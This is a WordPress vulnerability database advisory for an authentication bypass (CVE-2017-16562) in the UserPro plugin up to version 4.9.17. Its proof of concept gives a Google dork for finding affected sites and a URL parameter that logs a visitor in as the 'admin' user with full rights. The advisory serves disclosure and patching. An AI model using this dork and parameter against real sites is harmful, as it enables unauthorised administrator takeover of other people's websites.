UserPro <= 4.9.17 - Authentication Bypass

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The userpro plugin has the ability to bypass login authentication for the user
 'admin'. If the site does not use the standard username 'admin' it is not affected.
Proof of Concept
1 - Google Dork inurl:/plugins/userpro

2 - Browse to a site that has the userpro plugin installed.

3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true

4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site. You are now logged in will full administrator access.

Affects Plugin

fixed in version 4.9.17.1

References

CVE 2017-16562
EXPLOITDB 43117
URL https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Submitter Colette Chamberland, Iain Hadgraft
Submitter Website https://wordfence.com
Submitter Twitter @cjchamberland
Views 155
Verified No
WPVDB ID 8950

Timeline

Publicly Published 2017-11-10 (10 days ago)
Added 2017-11-12 (7 days ago)
Last Updated 2017-11-12 (7 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.